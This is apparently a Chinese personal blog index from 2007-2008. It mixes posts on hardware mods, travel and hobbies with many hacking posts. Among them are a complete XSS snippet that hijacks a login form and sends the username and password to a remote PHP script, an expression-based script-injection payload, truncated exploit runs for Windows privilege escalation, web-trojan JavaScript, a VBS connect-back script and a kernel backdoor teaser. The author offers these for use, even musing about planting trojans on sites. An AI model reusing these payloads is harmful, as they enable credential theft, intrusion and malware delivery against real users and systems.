2007年8月29日
摘要:
重装了N遍驱动,N遍Kmplayer,包括不同版本的,完美解码等,调试了无数回解码器,渲染器,分离器什么的,还是没有解决
最终发现是......
阅读全文
摘要:
主要工具:烙铁、钳子、铅笔刀(废了至少6把)、AB胶(至少2对)、砂纸、微型螺丝刀
主要材料:铅笔×112支(六边形最便宜那种)、棉签棍若干、烤肉签×1根、太阳能板、光控电路(废了一个)
附属工具:酌情购买创口帖(以本人神乎其技的刀hua也用了两三个,残念)
用时:没有好工具,而且空余时间构思加制作,花了4个月多点,之后零零散散做了些加工。
另:中间顺便去了趟乔家大院 & 平遥古城找找感觉
工具条件比较简陋,削斜面,切断之类都是用的铅笔刀,食指一侧都长茧了。
..........
阅读全文
摘要:
硬件需求:MC5725、小耳朵(天线)、EVDO资费卡、AN/AAA码、IMSI码
软件需求:T60BIOS2.22mod-1802 1804.iso、MC5725驱动、CDMA_Workshop_v2.7.rar、EVDO.prl、QPST_v2.7.rar、EVDO_Watcher.exe
WCDMA太贵,不考虑,移动的还早,现在比较流行的就是电信的EVDO,所以选定MC5725模块,而且还能GPS,由于国外都没有中国的机卡分离之说,所以需要把UIM卡的信息刷到模块上面,这个信息就是AN/AAA码和IMSI码,需要电信的内部人员提供,网上有些卖家能提供,不过现在好像越来越严了,估计以后很难拿到这些了。
如果需要发短信等普通手机功能,需要刷ESN码,还有鉴权什么的需要刷AKey,如果只是上3G,只要AN/AAA码和IMSI码即可。
以上是这几天翻阅海量帖子之后就我的理解,如有误人子弟的地方请指正。
拆机,安装硬件(之前换过不下5次液晶屏的灯管,此等级的拆机装机不费吹灰之力)
... 阅读全文
摘要:
绑定4444端口,Windows 2000 CN + SP4 测试通过,需要能建目录的用户,偏移地址若不通用,请自行修改。
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
..................
阅读全文
摘要:
TRS 是英文Text Retrieval System(文本检索系统)的缩写,据说是全文检索、搜索引擎、内容管理及知识管理核心技术和产品的统一,入选2008年度国家规划布局内重点软件企业,做某些渗透经常会碰到。
......
阅读全文
摘要:
鸟文没太看明白,摸索了一下,$_FILE数组元素解析的问题。
搭个php的环境,目录在C:\www下,根目录下有个upload.php代码如下
......
阅读全文
摘要:
更新频度视出差频度而定
上海虹桥机场
京沪空中快线A8登机口
cheerway snack bar A8/.............
阅读全文
摘要:
这才是牛逼黑客,控制整栋大厦电力系统,大厦灯光来做背景,改编成游戏!坦克大战~~
.............
阅读全文
摘要:
测试成功,点打印后,会弹出计算器
.........
阅读全文
摘要:
26个字母,26个钢琴键(键盘请在关闭汉字输入法 然后点下上面的FLASH以获得焦点,才可正常使用),可以用a-z来弹,也可以用鼠标
下面的音乐,弹出来就知道是什么了
.........
阅读全文
摘要:
反正很老的机子了,刷坏了大不了买个新的
增加了如下功能:
1. 去网标,那个CMCC
2. 拍照可静音,上次上课拍老师的投影,安静的课堂上,咔嚓咔嚓很尴尬
3. 更新声音和摄像的驱动
4. 增加歌词秀功能(这个是我迫切需要的功能)
5. 增加来电秀功能(来电或者去电,显示对方的物理地址)
6. 字体变小,看着舒服一点
7. 比较酷的主题
8. 改walkman界面
9. 修改休眠模式显示时间的字体
10. 长按侧面的+按钮,开启或者关闭照明灯
11. 还有GPS功能,不实用,只显示两个十六进制字符串,冒号分割,不知道什么意思,难道是经度纬度?
12. 应该还有,忘了
下面看图
....................
阅读全文
摘要:
%tmp:~2,1%
稍微看了下,原来这个字符串是这个意思:%tmp:~2,1% = mid(%tmp%,2,1) = \
......
阅读全文
摘要:
某些地方画得有出入,被人一通鄙视
欢总一语道破:观察太少了
...........
阅读全文
摘要:
我的有啥补丁打啥补丁的Win2k3 CN SP1测试成功
d:\Churrasco.exe "net user 009 /add"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 1948
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 472
.......
阅读全文
摘要:
“我的电脑黑屏了”
“我的电脑最近不知怎么变得很慢?“
“我上网老是自动弹出页面,怎么回事?”
“为什么杀毒软件老是弹出来,每次都是同一个病毒?”
.....................
任何人,我一般都会帮忙,但是长时间停留在这个问题上,会疯掉的,往往对方的描述不一定精确,光靠说,白白花了一天的时间也有可能搞不定一个小问题
也许有两种情况我会耐心的给你分析,1:领导,2:美女
我一般会说:“造成这种情况有149834种可能,重装吧,装完升级系统,打补丁,装杀毒,升级病毒库,不要装垃圾软件,不要上色情网站。”
下面讲讲一般步骤,以下讲的都是对付普通病毒,如果说驱动级,rootkit,bootkit什么的,要想让我用一篇简单的blog描述清楚恐怕不太现实,让你清理注入线程,SSDT之类的恶意程序就够你受的了。
................
阅读全文
摘要:
阅读全文
摘要:
080913 北京-八达岭高速-张家口-张北-宝昌镇(太仆寺旗)-桑根达来镇-乌日图塔拉苏木-锡林浩特-巴彦宝拉格苏木-阿尔善宝拉格镇-额和宝拉格苏木-乌里亚斯太镇(东乌珠穆沁旗)
080914 乌里亚斯太镇(东乌珠穆沁旗)-宝拉格苏木-巴彦霍布尔-额仁高毕苏木-满都胡宝拉格苏木-宝格达山林场-五岔沟镇-白狼镇-阿尔山市
080914 阿尔山游玩一天
080915 阿尔山-白狼镇-五岔沟镇-好仁苏木-科尔沁右翼前旗-突泉镇-科尔沁右翼中旗-高力板镇-舍伯吐镇-通辽-赤峰市
080916 赤峰市-承德市-北京
PS了一下,主要调了下颜色对比度等,裁剪了下尺寸,因为有的在车上拍的,画面中会有反光镜:),还有镜头上的水珠或者挡风玻璃上的虫子什么的,尽量PS掉了一些
..........
阅读全文
摘要:
写在文章开头的话:抑郁症严重者,切勿尝试以下操作
不要被标题误导了,不是直接一步升完,其实还是从6.10升到7.04再升7.10再升8.04再升8.10,相当漫长
(坚持6.10很久了,由于之前beryl特效是自己配置安装的,巨麻烦,一直舍不得升级)
.....................
阅读全文
摘要:
早上马拉松在家门口经过,下午去五棵松看女篮
十倍光学变焦,不是盖的,不过别人已经单反了
............
阅读全文
摘要:
http://www.midomi.com/,首页点上面的flash,Click and Sing or Hum
害我半夜翻箱倒柜找麦狼嚎,不过我唱的搜出来从来没对过,我确定是这套系统的识别率有问题,没错,确定一定以及肯定。
.........
阅读全文
摘要:
阅读全文
摘要:
(之前发的"关于Fs2You怎么才能不被和谐"的文章被和谐掉了)
装WordPress顺便看到的
默认plugins目录有hello.php文件,不过好像很多插........
阅读全文
摘要:
最近奥运了,地铁口变少了,开车单双号了,马路变窄了,物价上涨了,断奶一个礼拜了,股票下跌了,失业率上升了,社会动荡了,公司加班了,奖金不发了,关键是连烩面片都TMD开始放香菜了!
.........
阅读全文
摘要:
lcx给的,网上的都是放启动项,这个可以自动执行
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;
var x;
var obj;
.........
阅读全文
摘要:
今天找首歌,用kugoo,几百年不用,账号还在,提示自动升级,升完有个歌词的功能灰常不错,不像以前的歌词秀那种平均时间分配的显示歌词,而是类似卡拉OK的显示歌词方式,比较适合跑调王。不是非常精确,不过已经不错了。
一直用foobar,目前似乎还没有对应的插件。
......
阅读全文
摘要:
PS: 实在太经典,不得不转一下
献给所有的MGSER和游戏爱好者:
不论是作为psp平台上目前fami通评分最高的游戏(39分)来看,还是从完美承接了MGS3的剧情来看,合金装备-掌上行动都是一款不可多得的优秀作品。在旷世神作合金装备4即将发售之际,提前领略一下这个系列无与伦比的剧情魅力,也是我们献给每一个热爱该系列的玩家们小小礼物。
..............
阅读全文
摘要: 未测试,觉得比较鸡肋,能中的人实在太少了
阅读全文
摘要:
昨晚在吃饭的地方看了将近3小时电视(几乎不看电视,家里没电视),震憾,感人
太多太多太多感人的事迹,看着一幕幕画面,真有自己过去搬石头,帮忙出力的冲动,人家72小时不休息,大不了我48小时应该没问题,或者给人送个水什么的,能做什么就做什么。
给朋友打了个电话.......
阅读全文
摘要:
NESP第一个版本成功后,我就开始着手更加袖珍版本的改造,让我的NESP更容易携带。对于V3版本,我首先需要的是一块能够顺利运行NES游戏的主版NOAC,对比之前的版本,它的耗电量会更小。当然我不会保证所有NES游戏都能100%兼容,估计会有小部分NES游戏不能运行吧。
.......
阅读全文
摘要:
经过1个多月的使用时间,第一版本的NESP的缺陷就开始体现出来了。内部的一些保护油脂在我需要更换之前就失去作用了,还有其他的措施也没有起到预计的作用,主板最终还是被我的手汗侵蚀了。要是这种情况继续下去的话,按键部分的电路会彻底报销的。
............
阅读全文
摘要:
在一个黑暗的风雨交加之夜,一名疯狂的技师正操控着一台巨大的装置。他的手中拿着长长的木条,并等待适当的时机进行加工,工作间因为外面狂怒的闪电而充满白色的光芒。闪电再三击中建筑物,在被电弧缠绕的房间中,疯狂技师露出了魔鬼般的笑容。实验终于完结,把所有装置移除后,展现在我们面前的是:一个屏幕闪动着蓝光的盒子。
...............
阅读全文
摘要:
Windows的C++没有pthread_t类型,linux中有个pthread.h,很多站的VC代码,都不知道从哪包含来的,shit
网上看到有一个叫 POSIX Threads for Win32 的开源项目给出了一个功能比较完善的Windows下pthreads API的实现。
阅读全文
摘要:
本文的内容是 Win32 API(特别是进程、线程和共享内存服务)到 POWER 上 Linux 的映射。本文可以帮助您确定哪种映射服务最适合您的需要。作者向您详细介绍了他在移植 Win32 C/C++ 应用程序时遇到的 API 映射。
阅读全文
摘要:
刚去离我住的地方方圆二里地内最好的饭馆吃饭(叫音乐餐厅,这里所谓最好的是指:一个人吃饭价钱还能承受,味道可以,而且吃完还不会拉肚子),晚饭吃得早了点,因为晚上的火车,里面一个人都没有,除了服务员。坐下一四人小桌,服务员过来撤走三套餐具,留下一套离我最远的,在我对角的餐具,点了两个菜一个炒饭,
........
阅读全文
摘要: Win2k CN SP2 ,Win2k3 CN SP1下测试通过,其它未测试(不装XP那种垃圾)
D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmCo 阅读全文
摘要:
RefControl 0.8.10
要是上次找到这个插件就好了,省得我一遍一遍地用nc修改referer提交
很多防盗链和防本地提交是依靠用户浏览器自动提交.......
阅读全文
摘要: 以下方法修改完后,再刷新本页就能看到上面图片
Firefox:输入about:config进入配置页面,修改network.http.sendRefererHeader的值为1即可(默认是2),
.....
阅读全文
摘要:
milw0rm上的,生成器
lcx给的,稍微改了改代码,据说好用
未测试,最近忙到自杀的时间都没有
唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。
http://www.blogjava.net/Files/baicker/Real........
阅读全文
摘要: http://www.milw0rm.com/sploits/2008-zha0_ms08_014.rar
阅读全文
摘要:
貌似花了两小时
阅读全文
摘要: 开发人员兢兢业业搞研发、开源,商业公司却拿去申请专利
或许只是看了下面三行,您就忍不住想吐,那么麻烦坚持一下,如果可以的话顶一下日志我会感到万份荣幸
金山
删除FAT卷中文件的方法, 申请号:200610122249.5
彻底粉碎FAT卷中文件数据的方法, 申请号:200610122247.6
彻底粉碎NTFS卷中文件数据的方法, 申请号:200610122479.1
一种Windows平台下对抗API挂接的方法 http://www.cpsfu.com/G06F/2007/CN1936834.shtml
.............
阅读全文
摘要: 自从orale注入可以执行系统命令后,觉得oracle安全性实在太烂了,容易获得系统权限,又动不动就死翘翘
昨天给朋友做个渗透测试,稍微扫扫就死了
以前给客户做渗透测试也经常碰到过oracle死掉的问题
相比MSSQL,估计也就只有巨型数据查询速度快的优势了
阅读全文
摘要:
终于下完了众人期待的大作,PSP只用来看碟好几年了,今天终于拷个游戏玩玩
虽然还是拜托不了一个穿着性感的肌肉男,拿着怪异的兵器到处杀人(怪)的模式,不过画面和游戏性都是不错的说,操作非常爽快(但是我肯定没耐心玩完)
最近比较堕落,还有些公司的破事(好像谈到公司的事都是破事),没写什么技术性的文章也没看什么技术性的文章
阅读全文
摘要:
很多攒机的朋友都知道这个规律
品牌机为了吸引顾客,主要配件的配置会让你看着很高
为了降低成本,往往有某一个或者几个配件很“缺德”,要么杂牌,要么很低的配置
朋友一台式机,老抱怨慢,重装也不行,看分辩率高点的电影还顿,我问配置,答曰:CPU 2.50G 内存248M(估计256M)
朋友机器联想的
我就写明牌子了,咋的
阅读全文
摘要: javascript:window.setTimeout=null;showDirectDownload() 阅读全文
摘要: 老家的台式机坏了,好不容易修好了,也没啥用,就当“碟机”吧,重装系统,就装了个winrar和kmplayer
kmplayer播放某些avi文件的时候,对白小到几乎听不到,偶尔出现的背景音乐大到吓人,网上找了很多,准备按照步骤做,发现就没有提到的解码方式,我下的是kmplayer带所有解码包的版本,估计是没有注册。
在命令行到kmplayer的codecs目录,
执行如下命令:
........
阅读全文
摘要: 犁式(八字)第一次滑就会了,水平到了一定高度,就很难提升,哈哈,今天恨了下心,租了个教练学平行式的,顺便纠正了一下以前犁式的BUG
以下备忘,以便下次滑(说不定一年后),省得又花太多时间复习以前的技术
犁式:内八字(缓坡减速,刹车功效),重心在中间,左转重心在右脚,右转重心在左脚(惯性原理,总之重心在坡下那只脚,转弯外侧,如果你不是往坡上滑的话),板基本上水平(不是和破面平),刮雪才能起到减速作用,靠板立起的角度控制滑雪速度。
平行式:先从犁式开始,尽量使内侧的脚不受力(重心只在一条腿),能提起来,练习多次并逐渐提前抬脚的时间,直到你可以完全用一条滑雪板转弯,慢慢的收起来和另一只承重脚平行,如左拐,重心在右脚,左脚和右脚平行,要习惯双脚一高一低的感觉,用腿部的屈伸调解并保持正确的滑行姿势,转弯时尽量将外侧的膝盖置于另一只的后侧,方便下一次转换到直滑和转弯。
滑行过程中,重心前倾,小腿面和鞋梆之间要明显感觉到压力,重心稍低,双手前伸,保持平衡。挪板使之急停感觉应该是脚跟用力往坡下踩,使板横过来,高速下腿承受很大冲击力,得慢慢学习。
原地滑行:外八字 阅读全文
摘要: 总算是公德圆满
今年票贩子加价比票价还高,真是汗
有两张安检那里买的,可靠性没得说
...............
阅读全文
摘要: 要写个修改本地安全策略的工具,本以为修改注册表就行了,没想到还挺复杂,改策略,对应的注册表项会变,倒过来,改对应的注册表项,策略没变,郁闷
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account] |--------------------------------修改次数
"F"=hex:02,00,01,00,00,00,00,00,e0,7c,9e,21,1a,12,c6,01,43,00,00,00,00,00,00,\ 00 ~ 22
00,00,80,d2,16,47,b9,ff,ff,00,80,2c,ab,6d,fe,ff,ff,00,00,00,00,00,00,00,80,\ 23 ~ 47
00,cc,1d,cf,fb,ff,ff,ff,00,cc,1d,cf,fb,ff,ff,ff,00,00,00,00,00,00,00,00,f1,\ 48 ~ 72
03,00,00,00,00,00,00,02,00,18,00,00, 阅读全文
摘要: 任何网站,打开后(有图片的),浏览器输入
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
阅读全文
摘要: 网上找了N多资料,说得我晕头转向的,都是TMD资深顾问级别的文章,最后简单几步也可以搞定,过程如下:
我的SDK本来就是装好的,再装个DDK,就是重装系统,只要DDK目录还在,重新指定下即可,不用重装DDK
DDK目录为: f:\WINDDK\3790.1830
以下以HelloWorld为例
-----------------------------------------HelloWorld.h---------------------------------------------------
#ifndef __HELLOWORLD_H__
#define __HELLOWORLD_H__
#include
.................
阅读全文
摘要: 现在RK(rootkit)和ARK(anti- rootkit)的斗争已经进行了很久,在印象中最早出来的ARK工具是冰刃(IceSword),从冰刃开始出来到现在RK和ARK的斗争一直在继续,目前冰刃还是在流行当中,自己感觉也正是冰刃的出来才带动了当前流行的RK和ARK的斗争呵呵,现在很多病毒木马已经广泛的带有驱动,使用一些RK的技术和方法使自己更底层些更强大些,当前流行的ARK工具主要包括:隐藏进程检测,内核驱动检测,SSDT检测,代码HOOK检测,注册表隐藏的检测,隐藏文件的检测等一些功能的,下面谈谈自己对一些功能的简单愚见 嘻嘻。
..........
阅读全文
摘要: 方法一: 替换win32k.sys
在2k3的系统下ZwSetSystemInformation禁止了用户模式下加载驱动,只允许SMSS.exe加载win32k.sys。于是我们可以利用一下这个特点:
1. 注入SMSS.EXE
2. 打开SeLoadDriverPrivilege权限
3. 把原始的win32k.sys改名
4. 复制我们的驱动到\systemroot\system32下
5. 在SMSS.EXE中加载\\SystemRoot\\System32\\win32k.sys
6. 把\\SystemRoot\\System32\\win32k.sys改名
7. 把原始的win32k.sys文件改名改回去
..............
阅读全文
摘要: 一、蠕虫病毒具有自我复制能力
我们以普通的VB脚本为例来看看:
JavaScript代码
1. Set objFs=CreateObject ("Scripting.FileSystemObject")
2. '创建一个文件系统对象
3. objFs.CreateTextFile ("C:\virus.txt", 1)
4. '通过文件系统对象的方法创建了一个TXT文件。
.....................
阅读全文
摘要: 跟贴中看到已经有不少朋友成功的完成了前面的所有例题,今天我们在前面的基础上,继续深入。每一讲我都会引入一些新的知识和技术,但只有一点点,因为我希望在您读完贴之后就能立刻消化吸收,这是标准的循序渐进的案例式学习方法
另外在今天开始之前,我顺便说一下后面的教学计划:
我会再用3~4次的讲座来阐述shellcode技术,确保大家能够在比较简单的漏洞场景下实现通用、稳定的溢出利用程序(exploit)
..........
阅读全文
摘要: 麻雀虽小,五脏俱全
如果您顺利的学完了前面4讲的内容,并成功的完成了第2讲和第4讲中的实验,那么今天请跟我来一起挑战一下劫持有漏洞的进程,并向其植入恶意代码的实验,相信您成功完成这个实验后,学习的兴趣和自信心都会暴增。
开始之前,先简要的回答一下前几讲跟贴中提出的问题
代码编译少头文件问题:可能是个人习惯问题,哪怕几行长的程序我也会丢到project里去build,而不是用cl,所以没有注意细节。如果你们嫌麻烦,不如和我一样用project来build,应该没有问题的。否则的话,实验用的程序实在太简单了,这么一点小问题自己决绝吧。另外,看到几个同学说为了实验,专门恢复了古老的VC6.0,我也感动不已啊,呵呵。
...............
阅读全文
摘要: 上节课没有操练滴东西,不少蠢蠢欲动的同学肯定已经坐不住了。悟空,不要猴急,下面的两堂课都是实践课,用来在实践中深入体会上节课中的知识,并且很有趣味性哦
信息安全技术是一个对技术性要求极高的领域,除了扎实的计算机理论基础外、更重要的是优秀的动手实践能力。在我看来,不懂二进制就无从谈起安全技术。
缓冲区溢出的概念我若干年前已经了然于胸,不就是淹个返回地址把CPU指到缓冲区的shellcode去么。然而当我开始动手实践的时候,才发现实际中的情况远远比原理复杂。
................
阅读全文
摘要: 扫盲班第三讲开课啦!
上节课我们用越过数组边界的一个字节把邻接的标志变量修改成0,从而突破了密码验证程序。您实验成功了吗?没有的话回去做完实验在来听今天的课!
有几个同学反映编译器的问题,我还是建议用VC6.0,因为它build出来的PE最适合初学者领会概念。而且这门课动手很重要,基本上我的实验指导都是按VC6.0来写的,用别的build出来要是有点出入,实验不成功的话会损失学习积极性滴——实验获得的成就感是学习最好的动力。
............
阅读全文
摘要: 本想来点大道理申明下研究思路啥的,看到大家的热情期待,稍微调整一下讲课的顺序。从今天开始,将用3~4次给大家做一下栈溢出的扫盲。
栈溢出的文章网上还是有不少的(其实优秀的也就两三篇),原理也不难,读过基本上就能够明白是怎么回事。本次讲解将主要集中在动手调试方面,更加着重实践。
经过这3~4次的栈溢出扫盲,我们的目标是:
领会栈溢出攻击的基本原理
能够动手调试简易的栈溢出漏洞程序,并能够利用漏洞执行任意代码(最简易的shellcode)
.............
阅读全文
摘要: 您是否梦想过能够像电影上演的那样黑进任意一台机器远程操控?您的梦想是否曾经被书店里边满架子的反黑,防毒,擒木马的扫盲书强暴的体无完肤?
从今天开始,准备陆续发一系列关于软件漏洞方面基础知识的帖子,包括软件漏洞的研究价值,研究方法,堆栈利用的基础知识,shellcode的调试方法,漏洞调试方法,漏洞分析,漏洞挖掘,软件安全性测试等等,此外还将介绍一些metasploit架构和fuzz测试方面的入门知识。
软件漏洞分析,利用,发掘是当今安全技术界中流砥柱级别话题,如果您关注过black hat或者defcon之类的顶级安全技术峰会的话,就知道我不是在吹牛了。可惜的是这方面的中文资料很少,偶尔有一篇比较优秀的文章但又不够系统,目前为止也没有形成像破解技术这样的讨论风气,菜鸟们在黑灯瞎火的夜晚瞎折腾,没有交流和指导,兴趣就像被拔了气弥儿芯的车胎,很快就泄气了。
虽然漏洞分析与利用与破解在技术上各有侧重点,但逆向基础是共同的。以我个人的经验,能做crack的朋友只要稍加进修就能入门。就算没有任何汇编基础和逆向经验的朋友也不用担心,因为这 阅读全文
摘要: 通过hook ssdt中的ZwQuerySystemInformation来实现隐藏进程已经是很老的技术了。
qiweixue 在他的文章里面写的很清楚了:
http://bbs.pediy.com/showthread.php?t=36742&highlight=%E9%9A%90%E8%97%8F+%E8%97%8F%E8%BF%9B+%E8%BF%9B%E7%A8%8B
不过他的文章里面,进程名字是直接写死的,不能通过三层进行传递,而且得到ZwQuerySystemInformation是通过汇编的方法,这样在其他系统上可能会有问题,所以我做了一些改善如下:
1 通过应用程序将进程名字传递进来,可以传递多个进程名字,格式为:qq.exe;taskmgr.exe;
2 通用的方法来得到ZwQuerySystemInformation的地址,不过这个方法都是从rookit上得来的。
...........
阅读全文
摘要: 偶然发现OllyDBG.exe导出了一堆函数,这些函数都是供其插件调用的。对这种体系结构很感
兴趣,想弄清楚它的实现原理。后来又看到梁肇新的书《编程高手箴言》第278页提到的调用
门,觉得都应该差不多。
三种不同的解决办法(原理可能是一样的,:)):
1)在导出函数声明之前加上__declspec(dllexport)。例:
__declspec(dllexport) int Add(int a, int b);
__declspec(dllexport) int Sub(int a, int b);
__declspec(dllexport) int Mul(int a, int b);
__declspec(dllexport) int Div(int a, int b);
..........
阅读全文
摘要: icesword.exe 在执行的时候会放出一个驱动程序 ispubdrv.sys .
icesword.exe 装载 这个驱动,这个驱动安装后就不会卸载。直到系统重新启动。这可能是因为驱动中调用了
PsSetCreateThreadNotifyRoutine 函数.下面是这个函数在 ddk 中的介绍。
........
阅读全文
摘要: 一、为什么需要伪造内核:
IceSword(以下简称IS)为了防止一些关键系统函数(包括所有服务中断表中的函数以及IS驱动部分要使用到的一些关键函数)被 patch,它直接读取内核文件(以下简称“ntoskrnl.exe”),然后自己分析ntoskrnl.exe 的PE结构来获取关键系统函数的原始代码并且把当前内核中所有的关键系统函数还原为windows默认状态,这样保证了IS使用到的函数不被patch 过。也许你会想如果我们把还原后的函数再进行patch不还是能躲的过去吗?笔者也试过
.....................
阅读全文
摘要: [经典溢出攻击流程]
———————————
1. 查找Kernel32.dll基地址;
2. 查找GetProcAddress()函数地址;
3. 查找其它API函数地址;
4. CreateProcess();
5. 远程连接。
我们都知道WINDOWS的系统功能不像UNIX的系统调用那样实现,由于WINDOWS版本的不断更新,使得系统调用对SHELLCODE几乎起不到作用。
但是WINDOWS是靠DLL动态链接库来实现,这就是说,如果能从KERNEL32.DLL中获取LoadLibrary()和GetProcAddress()函数的地址,我们就可以调用WINDOWS下的所有函数了。
所以我们需要对KERNEL32.DLL进行地址定位,这也是本文的目的。
................
阅读全文
摘要:
1.起因
C++程序员对try,catch,throw都应该很熟悉,能知道VC怎么实现它的人就不多了,不过网络世界使很多人知道了它与SEH (structured exception handling)有密切关系,我也不例外,也是在若干年前从网络知道了SEH,并且大致也知道SEH的流程.但是和多数人一样在我的实践也很少直接使用 SEH,对SEH也就仅限于网络上一些文章的介绍.曾经在用Windbg对某些软件作分析,我遇到了断点失效的情况,查找资料介绍是SEH中的 Handler清除了调试寄存器,在分析.....................
阅读全文
摘要: 本文描述了一些方法,可以饶过目前主流的现代Anti-rootkit工具,包括但不限于:
Icesword 最新版
Gmer最新版
Rootkit unhooker 最新版
DarkSpy 最新版
AVG Anti-rootkit最新版
等等
................
阅读全文
摘要: '搞一个特殊的站准备用的,没想到,等写完了,洞补上了,郁闷
'by 009, baicker@hotmail.com
'date:071221
Dim revdata
set sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" )
set sc=createobject( "WScript.Shell" )
Set fso =CreateObject( "Scripting.FileSystemObject" )
sock.connect "127.0.0.1" , 1234
................
阅读全文
摘要:
众所周知,bo2k可以在一个指定的进程空间(比如explorer.exe进程)做为一个线程运行。本文试图找出一种方法,使得任意exe都可以在其他进程中以线程运行(当然,这里说的"任意"是有条件的,下面会讲到)。
为行文简单起见,我把先加载的exe称为宿主,后加载的exe称为客户。对于上面的例子,explorer.exe为宿主,bo2k.exe为客户。
基本知识
每一个exe都有一个缺省加载基址,一般都是0x400000。如果实际加载基址和缺省基址相同,程序中的重定位表就不需要修正(fixup),否则,就必须修正重定位表;
阅读全文
摘要: 之前的反弹sc有问题,请重新下载测试(071218)
阅读全文
摘要: secdrv local exp
winxp cn sp2, win2k3 cn sp1 测试通过
之前的版本只能xp下用,这个2k3也可以了,其实前段时间朋友给过我一个这个漏洞的1day,但是朋友的东西不能乱发,这个是自己写的,发出来大家恶心一下。 阅读全文
摘要: Win2k3_CN SP1 msjet40.dll ver 4.0.9025.0 测试成功
WinXP_CN SP2 msjet40.dll ver 4.0.8618.0 测试成功
mdb_d_exp.exe 为debug版本
mdb_r_exp.exe 为relrease版本
之前的反弹sc有问题,请重新下载测试(071218)
阅读全文
摘要: 注:Windows2000_CN SP2(我只有这台SP2的2k测试机),WindowsXP_CN SP2测试通过
网上流传的都TMD垃圾不能用,不知道抄来抄去转来转去哪些代码转错了
这个是我自己修改过的
阅读全文
摘要: 小改了一下代码,这下好用了
WinXP_CN SP2测试通过
Win2k3测试蓝屏,注意保存文件哦 阅读全文
摘要: 注:Windows2003_CN SP1 / WindowsXP_CN SP2 + RealPlay10.0 测试通过
好像10.5以下版本都中,这个似乎只能溢出一次,第一次溢出成功后,第二次开始会有realplay修复数据库的提示,点修复就中,取消不中
上次测试使用的"Windows 按钮突破专家" 4.5K 溢出没问题,但是"iecv.exe"那个87K
溢出的时候老是看不到界面,其实已经执行(进程中可以看到),不知道为什么(不知道是否大小问题)
另:IE5不中,代码中直接跳过了
阅读全文
摘要: 迅雷官方最新版本迅雷(Thunder5.7.4.401)依然受此漏洞影响
挂马相当好用,只是如果用iframe,宽高不能为0
(pplayer.dll 组件版本号:1.2.3.49,CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F)
阅读全文
摘要: 本文一共介绍了七种javascript加密方法:
在做网页时(其实是网页木马呵呵),最让人烦恼的是自己辛辛苦苦写出来的客户端IE运行的javascript代码常常被别人轻易的拷贝,实在让自己的心里有点不是滋味,要知道自己写点东西也挺累的......^*^
但我们也应该清楚地认识到因为javascript代码是在IE中解释执行,要想绝对的保密是不可能的,我们要做的就是尽可能的增大拷贝者复制的难度,让他知难而退(但愿~!~),下面我结合自己这几年来的实践,及个人研究的心得,和大家一起来探讨一下网页中javascript代码的加密解密技术。
以加密下面的javascript代码为例:
......
阅读全文
摘要: VC- Project Setting-Debug-Project Option语法解释
-优化-
/O1 最小化空间 minimize space
/Op[-] 改善浮点数一致性 improve floating-pt consistency
/O2 最大化速度 maximize speed
/Os 优选代码空间 favor code space
/Oa 假设没有别名 assume no aliasing
/Ot 优选代码速度 favor code speed
/Ob 内联展开(默认 n=0) inline expansion (default n=0)
/Ow 假设交叉函数别名 assume cross-function aliasing
/Od 禁用优化(默认值) disable optimizations (default)
/Ox 最大化选项。(/Ogityb2 /Gs) maximum opts. (/Ogityb1 /Gs)
/Og 启用全局优化 阅读全文
摘要: 一、autorun.inf是windows下操纵光盘行为的一个文件,需要放在光盘根目录下,部分操作对于硬盘也适用。
二、autorun.inf是可以被禁止的。方法如下:
点击开始->运行,在文本框中输入regedit或者regedt32。依次展开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer,其中的NoDriveTypeAutoRun子键限制着Autorun的作用范围,默认为95(16进制)。
................
阅读全文
摘要: 1.最短的动态插入JS.
代码:
<x/**/style=xss:expression(document.appendChild(document.createElement('script')).src='xss.js')>
2.获取表单密码.
代码:
window.onload=function(){document.forms['login'].onsubmit=function(){var a=new Image();a.src="http://127.0.0.1/loveshell.php"+this.username.value+"&"+this.password.value;this.submit();}};
.......
阅读全文
摘要: 使用OD反汇编修改NateOn,虽然很麻烦,最终还是搞定了,后来发现网上有段代码,直接可以实现程序多开,测试了MSN、NateOn没问题,代码如下:
.386
.model flat, stdcall
option casemap :none
include windows.inc
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib
............
阅读全文
摘要: 不说废话,且看怎么实现,我先拿SOHU BLOG做示范.
1.测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,\/前是真正的空格),在个人档案处看过滤了哪些.
’’;:!--"<javascript JAvaSCriPT>=&#{()} \/
结果
’’;:!--"=&#{()} // (&后是amp,论坛过滤了)
.........
阅读全文
摘要: 这是一个在内核模块中实现的反连后门,大家看看这于应用层上的实现有什么不同吧,呵呵
/*
* Kernel mode connect backdoor,haha~
*
* just a demo module to teach you how to write a backdoor in kernel mode,
* i belive you can add more code to make it strong and powerful,wulala.
*
* by wzt <wzt#xsec.org>
*
*/
阅读全文
摘要: 写程序麻烦,还要传上去,幸好VBS每台服务器应该都可以运行的吧,很少会又禁止的
使用SendKeys搞定
例如呼出Cain使用果如下脚本:)
Set WshShell= Wscript.CreateObject("Wscript.Shell")
Wscript.Sleep 1500
WshShell.SendKeys "%{PGUP}"
以下位SendKeys的相关使用方法等
............
阅读全文
摘要:
